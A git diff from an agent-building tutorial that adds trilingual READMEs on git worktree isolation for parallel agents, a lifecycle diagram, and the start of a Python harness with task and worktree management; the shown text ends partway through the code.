b/s17_autonomous_agents/images/autonomous-agents-overview.svg @@ -0,0 
+1,105 @@ + + + + + + + + + + + + + + + + + + + + + + Autonomous Agents — 空闲循环 + 自动认领 + WORK/IDLE 生命周期 + + + + s16 保留 + + s17 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s16 全保留) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + 队友生命周期(s17 新增:WORK → IDLE → SHUTDOWN) + + + + WORK 阶段 + inbox → LLM → bash / read / write + stop_reason == tool_use → loop + stop_reason != tool_use → IDLE + 最多 10 轮 / 可被 shutdown_request 中断 + + + + 任务完成 + + + + 发现新任务 + + + + IDLE 阶段(每 5s 轮询) + ├ 检查 inbox → 有消息 → 回 WORK + ├ scan_unclaimed_tasks → 认领 → 回 WORK + └ 60s 超时 → SHUTDOWN ↓ + idle_poll() + claim_task() + + + + SHUTDOWN + + + + 60s 超时 + + + + + s16: MessageBus + protocols + request_shutdown + plan approval + + s17: idle_poll + scan_unclaimed_tasks + auto_claim + identity re-injection + + + + Lead 工具不变(13) · 队友工具 5 → 7(+list_tasks, claim_task) · 队友自主认领,Lead 只创建任务 + diff --git a/s18_worktree_isolation/README.en.md b/s18_worktree_isolation/README.en.md new file mode 100644 index 000000000..67121f8da --- /dev/null +++ b/s18_worktree_isolation/README.en.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — Separate Directories, No Conflicts + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"Separate directories, no conflicts"* — Tasks own goals, worktrees own directories, bound by ID. +> +> **Harness layer**: Isolation — Parallel execution channels that never collide. + +--- + +## The Problem + +In s17, Alice and Bob both work in the same directory. Alice's task is "refactor the auth module," Bob's task is "refactor the UI login page." + +Alice runs `write_file("config.py", ...)`. Bob also runs `write_file("config.py", ...)`. Both edit the same file, overwriting each other. And there's no clean rollback — you can't tell which changes belong to whom. 
+ +**A shared filesystem is a disaster for multi-agent collaboration.** s15-s17 solved "who does what" (task system) and "how to communicate" (message bus), but didn't solve "where to work." + +--- + +## The Solution + +![Worktree Overview](images/worktree-overview.en.svg) + +Git worktree lets you create multiple independent working directories within the same repository, each with its own branch. Alice works in `.worktrees/auth-refactor/`, Bob works in `.worktrees/ui-login/` — no conflicts. + +All s17 capabilities preserved (auto-claiming, idle polling, message bus). Three additions: + +| Capability | Purpose | +|------|------| +| create_worktree | Create an independent directory + branch for a task | +| bind_task_to_worktree | Bind a task to its working directory | +| remove_worktree / keep_worktree | Clean up or preserve after completion | + +--- + +## How It Works + +### Creation: Task-Worktree Binding + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """Create a worktree, optionally bound to a task.""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +Binding rule: one task binds to one worktree. After binding, the task automatically advances to `in_progress` — having a workspace means work has started. 
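The isolation this buys can be checked end-to-end on a throwaway repository. Below is a self-contained sketch (worktree names like `auth-refactor` and `ui-login` are illustrative, not fixtures from this chapter's code):

```python
# Two worktrees of one repo, each checked out on its own wt/{name} branch.
import subprocess, tempfile
from pathlib import Path

def git(repo: Path, *args: str) -> str:
    r = subprocess.run(["git", "-C", str(repo), *args],
                       capture_output=True, text=True, check=True)
    return r.stdout.strip()

repo = Path(tempfile.mkdtemp())
git(repo, "init")
git(repo, "-c", "user.email=demo@example.com", "-c", "user.name=demo",
    "commit", "--allow-empty", "-m", "init")

(repo / ".worktrees").mkdir()
for name in ("auth-refactor", "ui-login"):
    git(repo, "worktree", "add", str(repo / ".worktrees" / name),
        "-b", f"wt/{name}", "HEAD")

# Each directory is on its own branch; a write in one never appears in the other.
for name in ("auth-refactor", "ui-login"):
    print(git(repo / ".worktrees" / name, "branch", "--show-current"))
```

Each worktree reports its own `wt/{name}` branch, and a file written in one directory never shows up in the other: that is the whole point of handing every task its own worktree.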
+ +### Cleanup: Keep or Remove + +After the task is done, two choices: + +```python +def keep_worktree(name: str): + """Preserve the worktree for later manual merge.""" + +def remove_worktree(name: str, complete_task: bool = True): + """Delete the worktree, optionally marking the task complete.""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = preserve the branch for human review before merging to main. Remove = delete directory + delete branch + mark task complete. One cleanup operation. + +### Event Log + +Every lifecycle operation is logged, enabling scene reconstruction after crashes: + +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +Event types: `create`, `remove`, `keep`. Reconstruction logic: read `events.jsonl` line by line, for each worktree take the last event — `create` means it's alive, `remove` means it's cleaned up. 
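The reconstruction pass described above fits in a few lines. A sketch assuming the same `events.jsonl` schema; `rebuild_state` is a hypothetical helper name, not a function from this chapter's code:

```python
import json, tempfile
from pathlib import Path

def rebuild_state(events_file: Path) -> dict[str, str]:
    """Replay events.jsonl; the last event per worktree wins."""
    last: dict[str, str] = {}
    for line in events_file.read_text().splitlines():
        if line.strip():
            event = json.loads(line)
            last[event["worktree"]] = event["type"]
    # create/keep -> still on disk; remove -> already cleaned up
    return {name: ("removed" if t == "remove" else "alive")
            for name, t in last.items()}

# Demo: 'auth' was created then removed; 'ui' was created and kept.
f = Path(tempfile.mkdtemp()) / "events.jsonl"
f.write_text("".join(json.dumps(e) + "\n" for e in [
    {"type": "create", "worktree": "auth", "task_id": "t1", "ts": 1},
    {"type": "create", "worktree": "ui",   "task_id": "t2", "ts": 2},
    {"type": "remove", "worktree": "auth", "task_id": "",   "ts": 3},
    {"type": "keep",   "worktree": "ui",   "task_id": "",   "ts": 4},
]))
print(rebuild_state(f))  # → {'auth': 'removed', 'ui': 'alive'}
```

Because the log is append-only, replaying it is idempotent: crash at any point, re-read the file, and the last event per worktree tells you what is still on disk.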
+ +--- + +## Changes from s17 + +| Component | Before (s17) | After (s18) | +|------|-----------|-----------| +| Working directory | All agents share WORKDIR | Each task gets an independent git worktree | +| Task data | id/subject/status/owner/blockedBy | + worktree field (bound directory) | +| New functions | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| Isolation method | None | `git worktree add` + independent branch `wt/{name}` | +| Cleanup | Task completion only | keep (preserve branch) / remove (delete + mark complete) | +| Crash recovery | None | events.jsonl lifecycle log | +| Lead tools | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| Teammate tools | 7 (s17) | 7 (unchanged, auto-claimed messages include worktree path) | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +Try this prompt: + +`Create two tasks, then create isolated worktrees for each. Run git status in each worktree to confirm isolation.` + +What to observe: Do the two worktrees' `git status` outputs show different branches? If you modify a file in one worktree, is the other worktree unaffected? + +--- + +## What's Next + +Agent teams can now self-organize in isolated workspaces. But agents' capabilities are limited to the tools we wrote — bash, read, write, glob, task... + +What if users already have their own tools? Like an internal Jira API, a custom deployment system? Should we rewrite everything? + +s19 MCP Plugin → Give agents a plugin system. External tools connect via a standard protocol — agents don't need to know who wrote them. + +
+Deep Dive into CC Source + +CC's worktree system is driven by two tools (`EnterWorktreeTool.ts` 127 lines, `ExitWorktreeTool.ts` 329 lines): + +**EnterWorktree**: Accepts an optional `name` parameter to create a new worktree. When `name` is omitted, a random name is auto-generated. The new worktree's branch name is based on HEAD, created under `.claude/worktrees/`. Each worktree's `/`-separated segment can only contain letters, digits, dots, underscores, and hyphens, max 64 characters. + +**ExitWorktree**: `action: 'keep'` (preserve directory and branch) or `'remove'` (delete both). On remove, if there are uncommitted changes, the tool **refuses** to execute unless `discard_changes: true` is set — a safety mechanism to prevent losing work. + +**Isolation**: The `isolation: 'worktree'` parameter on AgentTool lets sub-agents run in a worktree. This is an isolation mode for forked sub-agents (analyzed in s06). + +**isDestructive**: ExitWorktree's `isDestructive(input)` returns `input.action === 'remove'` — only flagged as destructive when actually deleting (one of the few tools in CC that overrides isDestructive, see s03 analysis). + +**Tutorial vs CC Key Difference**: The tutorial implements bidirectional task-worktree binding (Task data adds a `worktree` field). CC **does not have this mechanism**. CC's worktree state is managed via `PersistedWorktreeSession` (`utils/sessionStorage.ts`), with fields including `originalCwd`, `worktreePath`, `worktreeName`, `worktreeBranch`, `originalBranch`, `originalHeadCommit`, `sessionId`, `tmuxSessionName`, `hookBased` — no taskId. State is written to the current session's transcript file (type: `'worktree-state'`) via `saveWorktreeState()`, not a separate file. The tutorial uses `events.jsonl` for lifecycle events; CC uses session transcript + sessionStorage. + +
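That refusal-on-dirty behavior translates directly into the tutorial's idiom. A hedged sketch (this is not CC's code; `safe_remove_worktree` is a hypothetical name) that consults `git status --porcelain` before deleting:

```python
import subprocess, tempfile
from pathlib import Path

def git(repo: Path, *args: str) -> str:
    return subprocess.run(["git", "-C", str(repo), *args],
                          capture_output=True, text=True, check=True).stdout

def safe_remove_worktree(repo: Path, wt: Path, discard_changes: bool = False) -> str:
    # Same spirit as ExitWorktree: refuse to delete a dirty worktree.
    if git(wt, "status", "--porcelain").strip() and not discard_changes:
        return "Refused: uncommitted changes (set discard_changes=True to force)"
    git(repo, "worktree", "remove", str(wt), "--force")
    return "Removed"

# Throwaway repo with one dirty worktree.
repo = Path(tempfile.mkdtemp())
git(repo, "init")
git(repo, "-c", "user.email=demo@example.com", "-c", "user.name=demo",
    "commit", "--allow-empty", "-m", "init")
wt = repo / ".worktrees" / "demo"
wt.parent.mkdir()
git(repo, "worktree", "add", str(wt), "-b", "wt/demo", "HEAD")
(wt / "scratch.txt").write_text("wip")  # untracked file => dirty

print(safe_remove_worktree(repo, wt))                        # refused
print(safe_remove_worktree(repo, wt, discard_changes=True))  # removed
```

The first call is rejected because the untracked `scratch.txt` shows up in `--porcelain` output; only the explicit `discard_changes=True` opt-in allows the destructive path, mirroring CC's safety mechanism.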
+ + diff --git a/s18_worktree_isolation/README.ja.md b/s18_worktree_isolation/README.ja.md new file mode 100644 index 000000000..e39cc7165 --- /dev/null +++ b/s18_worktree_isolation/README.ja.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — それぞれのディレクトリ、互いに干渉しない + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"それぞれのディレクトリ、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、ID で紐付ける。 +> +> **Harness 層**: 隔離 — 決して衝突しない並列実行チャネル。 + +--- + +## 課題 + +s17 では、Alice と Bob は同じディレクトリで作業している。Alice のタスクは「認証モジュールのリファクタリング」、Bob のタスクは「UI ログインページのリファクタリング」。 + +Alice が `write_file("config.py", ...)` を実行。Bob も `write_file("config.py", ...)` を実行。二人が同じファイルを編集し、互いに上書きする。しかもクリーンなロールバックができない — どの変更が誰のものか区別できない。 + +**共有ファイルシステムはマルチ Agent 協作の災難。** s15-s17 は「誰が何をするか」(タスクシステム)と「どう通信するか」(メッセージバス)を解決したが、「どこで作業するか」は解決していなかった。 + +--- + +## ソリューション + +![Worktree Overview](images/worktree-overview.ja.svg) + +Git worktree は同じリポジトリ内に複数の独立した作業ディレクトリを作成でき、それぞれが独自のブランチを持つ。Alice は `.worktrees/auth-refactor/` で作業、Bob は `.worktrees/ui-login/` で作業 — 互いに干渉しない。 + +s17 の全機能を保持(自動認領、空き時ポーリング、メッセージバス)。3 つの追加: + +| 能力 | 目的 | +|------|------| +| create_worktree | タスク用に独立ディレクトリ + 独立ブランチを作成 | +| bind_task_to_worktree | タスクと作業ディレクトリを紐付け | +| remove_worktree / keep_worktree | 完了後にクリーンアップまたは保持 | + +--- + +## 仕組み + +### 作成:タスク-Worktree 紐付け + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """worktree を作成、オプションでタスクに紐付け。""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +紐付けルール:1 つのタスクに 1 つの worktree 
を紐付ける。紐付け後、タスクは自動的に `in_progress` に進む — 作業スペースができた = 作業開始。 + +### 片付け:Keep または Remove + +タスク完了後、2 つの選択肢: + +```python +def keep_worktree(name: str): + """worktree を保持、後で手動マージ。""" + +def remove_worktree(name: str, complete_task: bool = True): + """worktree を削除、オプションでタスクを完了マーク。""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = ブランチを保持し、人力レビュー後にメインブランチにマージ。Remove = ディレクトリ削除 + ブランチ削除 + タスク完了マーク。1 回の片付け操作。 + +### イベントログ + +各ライフサイクル操作をログに記録し、クラッシュ後の現場再建が可能: + +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +イベントタイプ:`create`、`remove`、`keep`。再建ロジック:`events.jsonl` を 1 行ずつ読み、各 worktree の最後のイベントを取得 — `create` なら生存中、`remove` ならクリーンアップ済み。 + +--- + +## s17 からの変更 + +| コンポーネント | 変更前 (s17) | 変更後 (s18) | +|--------------|------------|------------| +| 作業ディレクトリ | 全 Agent が WORKDIR を共有 | 各タスクが独立 git worktree | +| Task データ | id/subject/status/owner/blockedBy | + worktree フィールド(紐付けディレクトリ) | +| 新規関数 | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| 隔離方式 | なし | `git worktree add` + 独立ブランチ `wt/{name}` | +| 片付け | タスク完了のみ | keep(ブランチ保持)/ remove(削除+完了マーク) | +| クラッシュリカバリ | なし | events.jsonl ライフサイクルログ | +| Lead ツール | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| チームメイトツール | 7 (s17) | 7(変更なし、auto-claimed メッセージに worktree パスが付加) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +以下のプロンプトを試してください: + +`Create two tasks, then create isolated worktrees for each. 
Run git status in each worktree to confirm isolation.` + +観察ポイント:2 つの worktree の `git status` 出力は異なるブランチを表示しているか?片方の worktree でファイルを変更しても、もう片方に影響はないか? + +--- + +## 次の章 + +Agent チームは孤立した作業スペースで自己組織化できるようになった。しかし Agent の能力は、我々が書いたツールに制限される — bash、read、write、glob、task... + +もしユーザーがすでに自分のツールを持っていたら?例えば社内 Jira API、独自のデプロイシステム?一から書き直すべきか? + +s19 MCP Plugin → Agent にプラグインシステムを装備。外部ツールが標準プロトコルで接続、Agent は誰が書いたかを知る必要がない。 + +
+CC ソースコード深掘り + +CC の worktree システムは 2 つのツールで駆動(`EnterWorktreeTool.ts` 127 行、`ExitWorktreeTool.ts` 329 行): + +**EnterWorktree**:オプションの `name` パラメータで新しい worktree を作成。`name` を省略するとランダム名を自動生成。新しい worktree のブランチ名は HEAD をベースに、`.claude/worktrees/` に作成。各 worktree の `/` 区切りセグメントは英字、数字、ドット、アンダースコア、ハイフンのみ、最大 64 文字。 + +**ExitWorktree**:`action: 'keep'`(ディレクトリとブランチを保持)または `'remove'`(両方を削除)。Remove 時、未コミットの変更がある場合、`discard_changes: true` を設定しない限りツールは**実行を拒否** — 作業喪失を防ぐ安全機構。 + +**Isolation**:AgentTool の `isolation: 'worktree'` パラメータにより、サブ Agent が worktree 内で実行。これは fork subagent(s06 で分析)の隔離モード。 + +**isDestructive**:ExitWorktree の `isDestructive(input)` は `input.action === 'remove'` を返す — 実際に削除する時のみ destructive としてマーク(CC で isDestructive をオーバーライドしている数少ないツールの一つ、s03 分析を参照)。 + +**チュートリアル版 vs CC の主要な違い**:チュートリアル版は task-worktree の双方向バインディングを実装(Task データに `worktree` フィールドを追加)。CC **にはこの仕組みがない**。CC の worktree 状態は `PersistedWorktreeSession`(`utils/sessionStorage.ts`)で管理、フィールドには `originalCwd`、`worktreePath`、`worktreeName`、`worktreeBranch`、`originalBranch`、`originalHeadCommit`、`sessionId`、`tmuxSessionName`、`hookBased` がある — taskId はない。状態は `saveWorktreeState()` で現在のセッションの transcript ファイルに書き込まれる(type: `'worktree-state'`)、独立したファイルではない。チュートリアル版は `events.jsonl` でライフサイクルイベントを記録、CC は session transcript + sessionStorage。 + +
+ + diff --git a/s18_worktree_isolation/README.md b/s18_worktree_isolation/README.md new file mode 100644 index 000000000..595133c50 --- /dev/null +++ b/s18_worktree_isolation/README.md @@ -0,0 +1,155 @@ +# s18: Worktree Isolation — 各干各的,互不干扰 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s16 → s17 → `s18` → [s19](../s19_mcp_plugin/) + +> *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定。 +> +> **Harness 层**: 隔离 — 永不碰撞的并行执行通道。 + +--- + +## 问题 + +s17 中,Alice 和 Bob 都在同一个目录下工作。Alice 的任务是"重构认证模块",Bob 的任务是"重构 UI 登录页"。 + +Alice `write_file("config.py", ...)`。Bob 也 `write_file("config.py", ...)`。两个人改同一个文件,互相覆盖。而且无法干净地回滚——分不清哪些改动是谁的。 + +**共享文件系统是多 Agent 协作的灾难。** s15-s17 解决了"谁干什么"(任务系统)和"怎么通信"(消息总线),但没解决"在哪干"。 + +--- + +## 解决方案 + +![Worktree Overview](images/worktree-overview.svg) + +Git worktree 让你在同一仓库中创建多个独立的工作目录,每个有自己的分支。Alice 在 `.worktrees/auth-refactor/` 下工作,Bob 在 `.worktrees/ui-login/` 下工作——互不干扰。 + +s17 的全部能力保留(自主认领、空闲轮询、消息总线)。新增三样: + +| 能力 | 作用 | +|------|------| +| create_worktree | 为任务创建独立目录 + 独立分支 | +| bind_task_to_worktree | 把任务和工作目录绑定 | +| remove_worktree / keep_worktree | 完成后清理或保留 | + +--- + +## 工作原理 + +### 创建:任务-Worktree 绑定 + +```python +WORKTREES_DIR = WORKDIR / ".worktrees" + +def create_worktree(name: str, task_id: int = None) -> str: + """创建 worktree,可选绑定到任务。""" + path = WORKTREES_DIR / name + path.mkdir(parents=True, exist_ok=True) + run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if task_id: + bind_task_to_worktree(task_id, name) + return str(path) + +def bind_task_to_worktree(task_id: int, worktree_name: str): + task = load_task(task_id) + task["worktree"] = worktree_name + if task["status"] == "pending": + task["status"] = "in_progress" + save_task(task) +``` + +绑定规则:一个任务绑定一个 worktree。绑定后任务自动推进到 `in_progress`——任务有了自己的工作空间,等于开工了。 + +### 收尾:Keep 还是 Remove + +任务完成后,两个选择: + +```python +def keep_worktree(name: str): + """保留 worktree,后续手动合并。""" + +def remove_worktree(name: str, complete_task: bool = 
True): + """删除 worktree,可选标记任务完成。""" + wt = load_worktree(name) + run_git(["worktree", "remove", wt["path"], "--force"]) + if complete_task and wt.get("task_id"): + update_task(wt["task_id"], status="completed") +``` + +Keep = 留着分支,等人工 review 后合并到主分支。Remove = 删目录 + 删分支 + 标记任务完成。一次收尾。 + +### 事件流 + +每次生命周期操作写入日志,崩溃后可重建现场: + +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +事件类型:`create`(创建)、`remove`(删除)、`keep`(保留)。重建逻辑:逐行读 `events.jsonl`,每个 worktree 取最后一条事件——`create` 说明还活着,`remove` 说明已清理。 + +--- + +## 相对 s17 的变更 + +| 组件 | 之前 (s17) | 之后 (s18) | +|------|-----------|-----------| +| 工作目录 | 所有 Agent 共享 WORKDIR | 每个任务独立 git worktree | +| Task 数据 | id/subject/status/owner/blockedBy | + worktree 字段(绑定目录) | +| 新函数 | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| 隔离方式 | 无 | `git worktree add` + 独立分支 `wt/{name}` | +| 收尾 | 任务完成 | keep(保留分支)/ remove(删除+标记完成) | +| 崩溃恢复 | 无 | events.jsonl 生命周期日志 | +| Lead 工具 | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| 队友工具 | 7 (s17) | 7(不变,auto-claimed 消息附带 worktree 路径) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +试试这个 prompt: + +`Create two tasks, then create isolated worktrees for each. Run git status in each worktree to confirm isolation.` + +观察重点:两个 worktree 的 `git status` 输出是否显示不同的分支?在一个 worktree 里修改文件,另一个 worktree 是否不受影响? + +--- + +## 接下来 + +现在 Agent 团队能在隔离的工作空间中自组织了。但 Agent 的能力受限于我们给它写的工具——bash、read、write、glob、task... + +如果用户已经有了自己的工具怎么办?比如一个公司内部的 Jira API、一个自建的部署系统?难道要重写一遍? + +s19 MCP Plugin → 给 Agent 装一个插件系统。外部工具通过标准协议接入,Agent 不需要知道它们是谁写的。 + +
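附:前文「事件流」一节描述的重建逻辑可以写成下面的草图(假设 events.jsonl 字段与上文一致;`rebuild_state` 是示意用的假想函数名,并非本章代码中的函数):

```python
import json, tempfile
from pathlib import Path

def rebuild_state(events_file: Path) -> dict[str, str]:
    """逐行重放 events.jsonl,每个 worktree 以最后一条事件为准。"""
    last: dict[str, str] = {}
    for line in events_file.read_text().splitlines():
        if line.strip():
            event = json.loads(line)
            last[event["worktree"]] = event["type"]
    # create/keep → 还活着;remove → 已清理
    return {name: ("removed" if t == "remove" else "alive")
            for name, t in last.items()}

# 演示:auth 创建后被删除;ui 创建后被保留。
f = Path(tempfile.mkdtemp()) / "events.jsonl"
f.write_text("".join(json.dumps(e) + "\n" for e in [
    {"type": "create", "worktree": "auth", "task_id": "t1", "ts": 1},
    {"type": "remove", "worktree": "auth", "task_id": "",   "ts": 2},
    {"type": "create", "worktree": "ui",   "task_id": "t2", "ts": 3},
    {"type": "keep",   "worktree": "ui",   "task_id": "",   "ts": 4},
]))
print(rebuild_state(f))  # → {'auth': 'removed', 'ui': 'alive'}
```

日志是 append-only 的,重放是幂等的:无论在哪一步崩溃,重新读一遍文件,每个 worktree 的最后一条事件就能告诉你磁盘上还剩什么。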
+深入 CC 源码 + +CC 的 worktree 系统由两个工具驱动(`EnterWorktreeTool.ts` 127 行、`ExitWorktreeTool.ts` 329 行): + +**EnterWorktree**:接受可选的 `name` 参数创建新 worktree。省略 `name` 时自动生成随机名。新 worktree 的 branch 名基于 HEAD,创建在 `.claude/worktrees/` 下。每个 worktree 的 `/` 分隔段只能包含字母、数字、点、下划线、短横线,最大 64 字符。 + +**ExitWorktree**:`action: 'keep'`(保留目录和分支)或 `'remove'`(删除两者)。Remove 时如果有未提交的改动,除非设置 `discard_changes: true`,否则工具会**拒绝**执行——这是安全机制,防止丢失工作。 + +**isolation**:AgentTool 的 `isolation: 'worktree'` 参数让子 Agent 在 worktree 中运行。这是 fork subagent(s06 分析过)的一种隔离模式。 + +**isDestructive**:ExitWorktree 的 `isDestructive(input)` 返回 `input.action === 'remove'`——只在真正删除时才标记为 destructive(这是 CC 中极少数覆写了 isDestructive 的工具之一,见 s03 分析)。 + +**教学版 vs CC 的关键差异**:教学版做了 task-worktree 双向绑定(Task 数据加 `worktree` 字段),CC **没有这种机制**。CC 的 worktree 状态通过 `PersistedWorktreeSession`(`utils/sessionStorage.ts`)管理,字段包括 `originalCwd`、`worktreePath`、`worktreeName`、`worktreeBranch`、`originalBranch`、`originalHeadCommit`、`sessionId`、`tmuxSessionName`、`hookBased`——没有 taskId。状态通过 `saveWorktreeState()` 写入当前 session 的 transcript 文件(type: `'worktree-state'`),不是单独的文件。教学版用 `events.jsonl` 记录生命周期事件;CC 用 session transcript + sessionStorage。 + +
+ + diff --git a/s18_worktree_isolation/code.py b/s18_worktree_isolation/code.py new file mode 100644 index 000000000..a157ca2ed --- /dev/null +++ b/s18_worktree_isolation/code.py @@ -0,0 +1,861 @@ +#!/usr/bin/env python3 +""" +s18: Worktree Isolation — git worktree + task-directory binding + event log. + +Run: python s18_worktree_isolation/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s17: + - Task dataclass gains worktree field (str | None) + - create_worktree: git worktree add + optional task binding + - bind_task_to_worktree: update task JSON with worktree name + - remove_worktree / keep_worktree: cleanup lifecycle + - log_event: append to .worktrees/events.jsonl + - idle_poll: include worktree path in auto-claimed message + - 3 new Lead tools: create_worktree, remove_worktree, keep_worktree (13→16) + +ASCII topology: + Main repo (/) + ├── .worktrees/auth/ (branch: wt/auth) ← Task #1 + ├── .worktrees/ui/ (branch: wt/ui) ← Task #2 + ├── .tasks/task_xxx.json (worktree: "auth") + └── .worktrees/events.jsonl +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12 + s18 worktree field) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + worktree: str | None = None # s18: bound worktree name + + +def _task_path(task_id: str) 
-> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Worktree System (s18 new) ── + +WORKTREES_DIR = WORKDIR / ".worktrees" +WORKTREES_DIR.mkdir(exist_ok=True) + + +def run_git(args: 
list[str]) -> str: + try: + r = subprocess.run(["git"] + args, cwd=WORKDIR, + capture_output=True, text=True, timeout=30) + out = (r.stdout + r.stderr).strip() + return out[:5000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: git timeout" + + +def log_event(event_type: str, worktree_name: str, task_id: str = ""): + """Append a lifecycle event to events.jsonl.""" + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") + + +def create_worktree(name: str, task_id: str = "") -> str: + """Create a git worktree with a dedicated branch. Optionally bind to a task.""" + path = WORKTREES_DIR / name + if path.exists(): + return f"Worktree '{name}' already exists at {path}" + result = run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if "error" in result.lower() or "fatal" in result.lower(): + return f"Git error: {result}" + if task_id: + bind_task_to_worktree(task_id, name) + log_event("create", name, task_id) + print(f" \033[33m[worktree] created: {name} at {path}\033[0m") + return f"Worktree '{name}' created at {path}" + + +def bind_task_to_worktree(task_id: str, worktree_name: str): + """Update task with worktree binding. Auto-advance to in_progress.""" + task = load_task(task_id) + task.worktree = worktree_name + if task.status == "pending": + task.status = "in_progress" + save_task(task) + print(f" \033[33m[bind] {task.subject} → worktree:{worktree_name}\033[0m") + + +def remove_worktree(name: str) -> str: + """Remove worktree directory + branch. 
